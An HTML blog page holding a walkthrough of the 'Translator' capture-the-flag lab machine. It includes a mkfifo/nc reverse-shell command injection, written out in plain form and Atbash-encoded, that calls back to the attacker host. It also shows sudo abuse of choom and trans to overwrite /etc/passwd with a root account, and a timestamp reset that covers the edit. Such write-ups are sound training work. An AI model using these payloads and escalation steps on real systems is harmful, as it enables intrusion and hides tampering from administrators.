<!DOCTYPE html>
<html lang="en-US"><head><meta charset="utf-8">
<meta http-equiv="content-type" content="text/html">
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<title itemprop="name">Translator - Walkthrough | My Blog</title>
<meta property="og:title" content="Translator - Walkthrough | My Blog" />
<meta name="twitter:title" content="Translator - Walkthrough | My Blog" />
<meta itemprop="name" content="Translator - Walkthrough | My Blog" />
<meta name="application-name" content="Translator - Walkthrough | My Blog" />
<meta property="og:site_name" content="My Blog" />

<meta name="description" content="Walkthrough for the Translator machine.">
<meta itemprop="description" content="Walkthrough for the Translator machine." />
<meta property="og:description" content="Walkthrough for the Translator machine." />
<meta name="twitter:description" content="Walkthrough for the Translator machine." />

<meta property="og:locale" content="en-US" />
<meta name="language" content="en-US" />

  <link rel="alternate" hreflang="en" href="https://nvru.github.io/posts/hmv/translator/" title="" />





    
    
    

    <meta property="og:type" content="article" />
    <meta property="og:article:published_time" content=2026-07-06T00:00:00Z />
    <meta property="article:published_time" content=2026-07-06T00:00:00Z />
    <meta property="og:url" content="https://nvru.github.io/posts/hmv/translator/" />

    
    <meta property="og:article:author" content="null void root" />
    <meta property="article:author" content="null void root" />
    <meta name="author" content="null void root" />
    
    

    

    <script type="application/ld+json">
    {
        "@context": "https://schema.org",
        "@type": "Article",
        "headline": "Translator - Walkthrough",
        "author": {
        "@type": "Person",
        "name": "null void root"
        },
        "datePublished": "2026-07-06",
        "description": "Walkthrough for the Translator machine.",
        "wordCount":  714 ,
        "mainEntityOfPage": "https://nvru.github.io/posts/hmv/translator/",
        "dateModified": "2026-07-06",
        "image": {
        "@type": "ImageObject",
        "url": ""
        },
        "publisher": {
        "@type": "Organization",
        "name": "My Blog"
        }
    }
    </script>


<meta name="generator" content="Hugo 0.163.3">

    
    <meta property="og:url" content="https://nvru.github.io/posts/hmv/translator/">
	<meta property="og:site_name" content="My Blog">
	<meta property="og:title" content="Translator - Walkthrough">
	<meta property="og:description" content="Walkthrough for the Translator machine.">
	<meta property="og:locale" content="en_US">
	<meta property="og:type" content="article">
		<meta property="article:section" content="posts">
		<meta property="article:published_time" content="2026-07-06T00:00:00+00:00">
		<meta property="article:modified_time" content="2026-07-06T00:00:00+00:00">
		<meta property="article:tag" content="Ctf">
		<meta property="article:tag" content="Walkthrough">
		<meta property="article:tag" content="Linux">
		<meta property="article:tag" content="Web">
		<meta property="article:tag" content="Command-Injection">
		<meta property="article:tag" content="Privilege-Escalation">


    
    
	<meta name="twitter:card" content="summary">
	<meta name="twitter:title" content="Translator - Walkthrough">
	<meta name="twitter:description" content="Walkthrough for the Translator machine.">


    

    <link rel="canonical" href="https://nvru.github.io/posts/hmv/translator/">
    <link href="/style.min.e390ba7da26222f4dc42a349955d76dbbe44e5ce2535a43de5a70633a0a9ec3c.css" rel="stylesheet">
    <link href="/code-highlight.min.706d31975fec544a864cb7f0d847a73ea55ca1df91bf495fd12a177138d807cf.css" rel="stylesheet">

    
    <link rel="apple-touch-icon" sizes="180x180" href="/icons/apple-touch-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="/icons/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="/icons/favicon-16x16.png">
    <link rel="mask-icon" href="/icons/safari-pinned-tab.svg">
    <link rel="shortcut icon" href="/favicon.ico">




<link rel="manifest" href="https://nvru.github.io/site.webmanifest">

<meta name="msapplication-config" content="/browserconfig.xml">
<meta name="msapplication-TileColor" content="#2d89ef">
<meta name="theme-color" content="#434648">
    <meta name="color-scheme" content="light dark">

    
    <link rel="icon" type="image/svg+xml" href="/icons/favicon.svg">

    
    
    
</head>
<body data-theme = "dark" class="notransition">

<script src="/js/theme.min.8961c317c5b88b953fe27525839672c9343f1058ab044696ca225656c8ba2ab0.js" integrity="sha256-iWHDF8W4i5U/4nUlg5ZyyTQ/EFirBEaWyiJWVsi6KrA="></script>

<div class="navbar" role="navigation">
    <nav class="menu" aria-label="Main Navigation">
        <a href="https://nvru.github.io/" class="logo">
            <svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" 
viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" 
stroke-linejoin="round" class="feather feather-home">
<title>Home</title>
<path d="M3 9l9-7 9 7v11a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2z"></path>
<polyline points="9 22 9 12 15 12 15 22"></polyline>
</svg>
        </a>
        <input type="checkbox" id="menu-trigger" class="menu-trigger" />
        <label for="menu-trigger">
            <span class="menu-icon">
                <svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" stroke="currentColor" fill="none" viewBox="0 0 14 14"><title>Menu</title><path stroke-linecap="round" stroke-linejoin="round" d="M10.595 7L3.40726 7"></path><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 3.51488L3.49301 3.51488"></path><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 10.4851H3.49301"></path><path stroke-linecap="round" stroke-linejoin="round" d="M0.5 12.5V1.5C0.5 0.947715 0.947715 0.5 1.5 0.5H12.5C13.0523 0.5 13.5 0.947715 13.5 1.5V12.5C13.5 13.0523 13.0523 13.5 12.5 13.5H1.5C0.947715 13.5 0.5 13.0523 0.5 12.5Z"></path></svg>
            </span>
        </label>

        <div class="trigger">
            <ul class="trigger-container">
                
                
                <li>
                    <a class="menu-link " href="/">
                        Home
                    </a>
                    
                </li>
                
                <li>
                    <a class="menu-link active" href="/posts/hmv/">
                        HMV
                    </a>
                    
                </li>
                
                <li>
                    <a class="menu-link " href="/posts/htb/">
                        HTB
                    </a>
                    
                </li>
                
                <li>
                    <a class="menu-link " href="/posts/thm/">
                        THM
                    </a>
                    
                </li>
                
                <li>
                    <a class="menu-link " href="/about/">
                        About
                    </a>
                    
                </li>
                
                <li class="menu-separator">
                    <span>|</span>
                </li>
                
                
            </ul>
            <a id="mode" href="#">
                <svg xmlns="http://www.w3.org/2000/svg" class="mode-sunny" width="21" height="21" viewBox="0 0 14 14" stroke-width="1">
<title>LIGHT</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></circle><line x1="7" y1="0.5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="0.5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line></g></svg>
                <svg xmlns="http://www.w3.org/2000/svg" class="mode-moon" width="21" height="21" viewBox="0 0 14 14" stroke-width="1">
<title>DARK</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></circle><line x1="7" y1="0.5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="0.5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line></g></svg>
            </a>
        </div>
    </nav>
</div>

<div class="wrapper post">
    <main class="page-content" aria-label="Content">
        <article>
            <header class="header">
                <h1 class="header-title">Translator - Walkthrough</h1>
                
                
                
                <div class="post-meta">
                    <time datetime="2026-07-06T00:00:00&#43;00:00" itemprop="datePublished"> 6 Jul 2026 </time>
                </div>
                
            </header>
            
    
    <details class="toc" ZgotmplZ>
        <summary><b>Table of Contents</b></summary>
        <nav id="TableOfContents">
  <ul>
    <li><a href="#target-information">Target Information</a></li>
    <li><a href="#port-scanning">Port Scanning</a>
      <ul>
        <li><a href="#rustscan">RustScan</a></li>
        <li><a href="#nmap">Nmap</a></li>
      </ul>
    </li>
  </ul>

  <ul>
    <li><a href="#http-port-80">HTTP (Port 80)</a></li>
    <li><a href="#command-injection">Command Injection</a>
      <ul>
        <li><a href="#original-payload">Original Payload</a></li>
        <li><a href="#atbash-encoded-payload">Atbash-Encoded Payload</a></li>
      </ul>
    </li>
  </ul>

  <ul>
    <li><a href="#privilege-escalation">Privilege Escalation</a>
      <ul>
        <li><a href="#user-enumeration">User Enumeration</a></li>
        <li><a href="#ocean--india">ocean → india</a></li>
        <li><a href="#india--root">india → root</a></li>
      </ul>
    </li>
    <li><a href="#cleanup">Cleanup</a></li>
    <li><a href="#credentials">Credentials</a>
      <ul>
        <li><a href="#ssh">SSH</a></li>
      </ul>
    </li>
  </ul>
</nav>
    </details>
            <div class="page-content">
                <p><img src="/images/hmv/translator/vm.png" alt="Translator VM"></p>
<h2 id="target-information">Target Information</h2>
<table>
	<thead>
			<tr>
					<th>Role</th>
					<th>IP Address</th>
			</tr>
	</thead>
	<tbody>
			<tr>
					<td>Attacker</td>
					<td><code>10.10.10.2</code></td>
			</tr>
			<tr>
					<td>Machine</td>
					<td><code>10.10.10.13</code></td>
			</tr>
	</tbody>
</table>
<hr>
<h2 id="port-scanning">Port Scanning</h2>
<h3 id="rustscan">RustScan</h3>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>rustscan -a 10.10.10.13 -- -oA nmap/rust
</span></span></code></pre></div><h4 id="results">Results</h4>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>Open 10.10.10.13:22
</span></span><span style="display:flex;"><span>Open 10.10.10.13:80
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>[~] Starting Script(s)
</span></span><span style="display:flex;"><span>[&gt;] Running script &#34;nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -oA nmap/rust&#34; on ip 10.10.10.13
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>PORT   STATE SERVICE REASON
</span></span><span style="display:flex;"><span>22/tcp open  ssh     syn-ack
</span></span><span style="display:flex;"><span>80/tcp open  http    syn-ack
</span></span></code></pre></div><hr>
<h3 id="nmap">Nmap</h3>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>nmap -sSCV -A -p22,80 -oA nmap/22_80 --min-rate<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span> 10.10.10.13
</span></span></code></pre></div><h4 id="results-1">Results</h4>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>PORT   STATE SERVICE VERSION
</span></span><span style="display:flex;"><span>22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>| ssh-hostkey:
</span></span><span style="display:flex;"><span>|   3072 08:cf:50:b2:4f:41:43:c4:66:56:ce:96:b9:04:8c:77 (RSA)
</span></span><span style="display:flex;"><span>|   256 40:b7:11:24:76:59:cd:e0:79:db:71:d1:39:29:d5:45 (ECDSA)
</span></span><span style="display:flex;"><span>|_  256 44:64:ba:b8:52:4f:ca:00:dd:3e:c3:28:71:6f:77:76 (ED25519)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>80/tcp open  http    nginx 1.18.0
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>|_http-title: Site doesn&#39;t have a title (text/html)
</span></span><span style="display:flex;"><span>|_http-server-header: nginx/1.18.0
</span></span></code></pre></div><p>Only two TCP ports are exposed:</p>
<ul>
<li><strong>22</strong> - OpenSSH</li>
<li><strong>80</strong> - HTTP (nginx)</li>
</ul>
<hr>
<h1 id="enumeration">Enumeration</h1>
<h2 id="http-port-80">HTTP (Port 80)</h2>
<p>Browsing to the web server reveals a simple page containing a text input field.</p>
<p><img src="/images/hmv/translator/http.png" alt="HTTP Form"></p>
<p><img src="/images/hmv/translator/send_hello.png" alt="Curl "></p>
<p>When entering the string:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>hello
</span></span></code></pre></div><p>the application returns:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>svool
</span></span></code></pre></div><p><img src="/images/hmv/translator/cyber_chef.png" alt="Cyber Chef"></p>
<ul>
<li><code>https://gchq.github.io/CyberChef/</code></li>
</ul>
<p>Initially I attempted to identify the encoding using CyberChef, but no automatic detection succeeded. After testing several classical ciphers, the output was identified as the <strong>Atbash cipher</strong>.</p>
<hr>
<h2 id="command-injection">Command Injection</h2>
<p>Since the application appeared to process user input on the backend, I tested for command injection.</p>
<p>Simple payloads did not produce visible output. However, the absence of output does not necessarily mean the application is not vulnerable, so I tested several reverse shell payloads.</p>
<p>The standard Bash reverse shell failed, but the classic <strong>mkfifo + nc</strong> payload successfully established a reverse shell.</p>
<p>Because the application translates the supplied input using the <strong>Atbash cipher</strong> before processing it, the payload must first be encoded with Atbash. The server then decodes it back to the original command and executes it.</p>
<p><img src="/images/hmv/translator/rev_shell_web.png" alt="Reverse Shell"></p>
<h3 id="original-payload">Original Payload</h3>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2&gt;&amp;1|nc 10.10.10.2 <span style="color:#ae81ff">9001</span> &gt;/tmp/f
</span></span></code></pre></div><h3 id="atbash-encoded-payload">Atbash-Encoded Payload</h3>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>in /gnk/u;npurul /gnk/u;xzg /gnk/u|hs -r 2&gt;&amp;1|mx 10.10.10.2 <span style="color:#ae81ff">9001</span> &gt;/gnk/u
</span></span></code></pre></div><hr>
<h1 id="initial-access">Initial Access</h1>
<p>After stabilizing the shell, I checked the current user&rsquo;s sudo permissions.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>sudo -l
</span></span></code></pre></div><p>A password was required, so I continued enumerating the web directory.</p>
<p>Inside <code>/var/www/html</code> I discovered a strangely named file.</p>
<p><img src="/images/hmv/translator/file_www.png" alt="Web Directory"></p>
<p>The filename was:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>hvxivg
</span></span></code></pre></div><p>Its contents were:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>Mb kzhhdliw rh zbfie3w4
</span></span></code></pre></div><p>Because the web application itself uses the Atbash cipher, I decoded both the filename and the file contents.</p>
<p>Filename:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>hvxivg
</span></span></code></pre></div><p>↓</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>secret
</span></span></code></pre></div><p>Contents:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>Mb kzhhdliw rh zbfie3w4
</span></span></code></pre></div><p>↓</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>My password is ayurv3d4
</span></span></code></pre></div><p><img src="/images/hmv/translator/file_name_dcode.png" alt="Decoded Filename"></p>
<p><img src="/images/hmv/translator/pass_decode.png" alt="Decoded Password"></p>
<ul>
<li><code>https://www.dcode.fr/atbash-cipher</code></li>
</ul>
<hr>
<hr>
<h2 id="privilege-escalation">Privilege Escalation</h2>
<h3 id="user-enumeration">User Enumeration</h3>
<p>Since I already had a shell, enumerating local users was straightforward.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>ls /home
</span></span></code></pre></div><p>or</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>cat /etc/passwd
</span></span></code></pre></div><p>The machine contained two users:</p>
<ul>
<li><code>india</code></li>
<li><code>ocean</code></li>
</ul>
<p>Using the recovered password, only the <strong>ocean</strong> account authenticated successfully.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>ocean : ayurv3d4
</span></span></code></pre></div><p><img src="/images/hmv/translator/su_ocean.png" alt="Switch to ocean"></p>
<p><img src="/images/hmv/translator/users.png" alt="Users"></p>
<h3 id="ocean--india">ocean → india</h3>
<p>Checking sudo permissions again revealed that <strong>ocean</strong> could execute <strong>choom</strong> as the <strong>india</strong> user.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>sudo -l
</span></span></code></pre></div><p><img src="/images/hmv/translator/su_india.png" alt="sudo -l"></p>
<p>Reading both the man page and GTFOBins revealed that <code>choom</code> can execute arbitrary commands.</p>
<p>Useful references:</p>
<ul>
<li><a href="https://gtfobins.org/gtfobins/choom/">https://gtfobins.org/gtfobins/choom/</a></li>
<li><a href="https://man7.org/linux/man-pages/man1/choom.1.html">https://man7.org/linux/man-pages/man1/choom.1.html</a></li>
</ul>
<p>The following command spawns a Bash shell as <strong>india</strong>.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>choom -n <span style="color:#ae81ff">0</span> /bin/bash
</span></span></code></pre></div><p>Where:</p>
<ul>
<li><code>-n</code> specifies the adjustment score.</li>
<li><code>/bin/bash</code> is the command to execute.</li>
</ul>
<p><img src="/images/hmv/translator/choom_man_page.png" alt="choom Man Page"></p>
<p>After obtaining the shell, I switched to SSH for a more stable session.</p>
<hr>
<h3 id="india--root">india → root</h3>
<p>Checking sudo permissions as <strong>india</strong> revealed the following binary could be executed as <strong>root</strong> without a password.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>/usr/local/bin/trans
</span></span></code></pre></div><p>The binary is a translation utility capable of translating files using several translation engines.</p>
<p>Reading its manual page showed that it accepts files as input and allows writing the translated output to another file.</p>
<p><img src="/images/hmv/translator/man_trans.png" alt="trans Man Page"></p>
<p>My initial idea was to read <code>/root/.ssh/id_rsa</code>, but no private key existed.</p>
<p><img src="/images/hmv/translator/no_id_root.png" alt="No Root SSH Key"></p>
<p>Instead, I targeted <code>/etc/passwd</code>.</p>
<p>First, I created a backup of the file.</p>
<p>The <code>trans</code> utility reformats text, repeats lines, and inserts additional whitespace, so having a backup proved useful during testing.</p>
<p>I generated a password hash using OpenSSL.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>openssl passwd -6
</span></span></code></pre></div><p>Then I created a modified copy of <code>/etc/passwd</code> containing a new user with UID <strong>0</strong> and GID <strong>0</strong>, effectively granting root privileges.</p>
<p>After overwriting the original <code>/etc/passwd</code>, I logged in using the newly created account and obtained a root shell.</p>
<p><img src="/images/hmv/translator/passwd_trans.png" alt="Modified passwd"></p>
<p><img src="/images/hmv/translator/passwds_diff.png" alt="passwd Differences"></p>
<p><img src="/images/hmv/translator/root_shell.png" alt="Root Shell"></p>
<hr>
<h2 id="cleanup">Cleanup</h2>
<p>After obtaining root access, I restored the original <code>/etc/passwd</code> from the backup created during exploitation.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>cp /dev/shm/passwd.bak /etc/passwd
</span></span></code></pre></div><p>Restoring the original file removes the temporary backdoor account and returns the system to its initial state.</p>
<p><img src="/images/hmv/translator/passwd_Clean.png" alt="Clean passwd"></p>
<p>Since replacing <code>/etc/passwd</code> updates its timestamps, I restored the original modification time using:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>touch -t <span style="color:#ae81ff">202205111435</span> /etc/passwd
</span></span></code></pre></div><p>This resets the file&rsquo;s timestamp, making the restored file consistent with its original metadata.</p>
<p><img src="/images/hmv/translator/time_date_etc_passwd.png" alt="Restore Timestamp"></p>
<hr>
<h2 id="credentials">Credentials</h2>
<h3 id="ssh">SSH</h3>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>ocean : ayurv3d4
</span></span></code></pre></div><hr>
<h1 id="flags">Flags</h1>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>user flag : a6765hftgnhvugy473f
</span></span><span style="display:flex;"><span>root flag : h87M5364V2343ubvgfy
</span></span></code></pre></div>
            </div>
        </article></main>
</div>
<footer class="footer">
    <span class="footer_item"> </span>
    &nbsp;

    <div class="footer_social-icons">
<a href="https://codeberg.org/vru" target="_blank" rel="noopener noreferrer me"
    title="Codeberg">
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"
    stroke-linecap="round" stroke-linejoin="round">
 <g transform="translate(2.4, 2.4) scale(0.8)">
  <path d="M11.955.49A12 12 0 0 0 0 12.49a12 12 0 0 0 1.832 6.373L11.838 5.928a.187.14 0 0 1 .324 0l10.006 12.935A12 12 0 0 0 24 12.49a12 12 0 0 0-12-12 12 12 0 0 0-.045 0zm.375 6.467 4.416 16.553a12 12 0 0 0 5.137-4.213z"/>
 </g>
</svg>
</a>
<a href="https://github.com/nvru" target="_blank" rel="noopener noreferrer me"
    title="Github">
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"
    stroke-linecap="round" stroke-linejoin="round">
    <path
        d="M9 19c-5 1.5-5-2.5-7-3m14 6v-3.87a3.37 3.37 0 0 0-.94-2.61c3.14-.35 6.44-1.54 6.44-7A5.44 5.44 0 0 0 20 4.77 5.07 5.07 0 0 0 19.91 1S18.73.65 16 2.48a13.38 13.38 0 0 0-7 0C6.27.65 5.09 1 5.09 1A5.07 5.07 0 0 0 5 4.77a5.44 5.44 0 0 0-1.5 3.78c0 5.42 3.3 6.61 6.44 7A3.37 3.37 0 0 0 9 18.13V22">
    </path>
</svg>
</a>
<a href="https://linkedin.com/in/abdullah-keitut-880a09385" target="_blank" rel="noopener noreferrer me"
    title="Linkedin">
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"
    stroke-linecap="round" stroke-linejoin="round">
    <path d="M16 8a6 6 0 0 1 6 6v7h-4v-7a2 2 0 0 0-2-2 2 2 0 0 0-2 2v7h-4v-7a6 6 0 0 1 6-6z"></path>
    <rect x="2" y="9" width="4" height="12"></rect>
    <circle cx="4" cy="4" r="2"></circle>
</svg>
</a>
</div>
    <small class="footer_copyright">
        © 2026 null void root.
        Powered by <a href="https://github.com/hugo-sid/hugo-blog-awesome" target="_blank" rel="noopener">Hugo blog awesome</a>.
    </small>
</footer>







    
    <script src="https://nvru.github.io/js/main.min.4ee188e1744c19816e95a540b2650ed9f033ea0371e74eac8e717355cfca8741.js" integrity="sha256-TuGI4XRMGYFulaVAsmUO2fAz6gNx506sjnFzVc/Kh0E="></script>

    

</body>
</html>
